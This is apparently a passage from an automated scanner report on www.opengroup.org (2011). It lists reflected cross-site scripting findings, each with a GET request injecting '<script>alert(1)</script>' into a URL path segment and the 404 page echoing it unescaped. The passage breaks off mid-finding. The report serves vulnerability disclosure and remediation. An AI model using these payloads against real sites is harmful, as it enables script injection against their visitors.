Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:27 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html -->
...[SNIP]...

3.159. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html">
...[SNIP]...

3.160. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html<br>
...[SNIP]...

3.161. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc">
...[SNIP]...

3.162. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:37 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e -->
...[SNIP]...

3.163. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:33 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842<br>
...[SNIP]...

3.164. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5143

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm<br>
...[SNIP]...

3.165. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm">
...[SNIP]...

3.166. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm -->
...[SNIP]...

3.167. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 -->
...[SNIP]...

3.168. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff">
...[SNIP]...

3.169. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5146

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11<br>
...[SNIP]...

3.170. http://www.opengroup.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4234

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 -->
...[SNIP]...

3.171. http://www.opengroup.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Request

GET /favicon.icod03a9<script>alert(1)</script>8588ad7c49d HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4228

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/favicon.icod03a9<script>alert(1)</script>8588ad7c49d<br>
...[SNIP]...

3.172. http://www.opengroup.org/member/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Request

GET /member9518a"><script>alert(1)</script>7cfc26038a0/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5147

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/member9518a"><script>alert(1)</script>7cfc26038a0/">
...[SNIP]...

3.173. http://www.opengroup.org/member/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Request

GET /membere150e<script>alert(1)</script>79cf08e9fff/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5141

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/membere150e<script>alert(1)</script>79cf08e9fff/<br>
...[SNIP]...

3.174. http://www.opengroup.org/member/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member55638--><script>alert(1)</script>939d930983d/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5150

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /member55638--><script>alert(1)</script>939d930983d/ -->
...[SNIP]...

3.175. http://www.opengroup.org/togaf/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togafd840c--><script>alert(1)</script>b085a6e8f6a/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4224

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togafd840c--><script>alert(1)</script>b085a6e8f6a/ -->
...[SNIP]...

3.176. http://www.opengroup.org/togaf/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Request

GET /togaf26e07<script>alert(1)</script>229d277a473/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4218

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf26e07<script>alert(1)</script>229d277a473/<br>
...[SNIP]...

3.177. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf977a7d"><script>alert(1)</script>5d373802e00/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
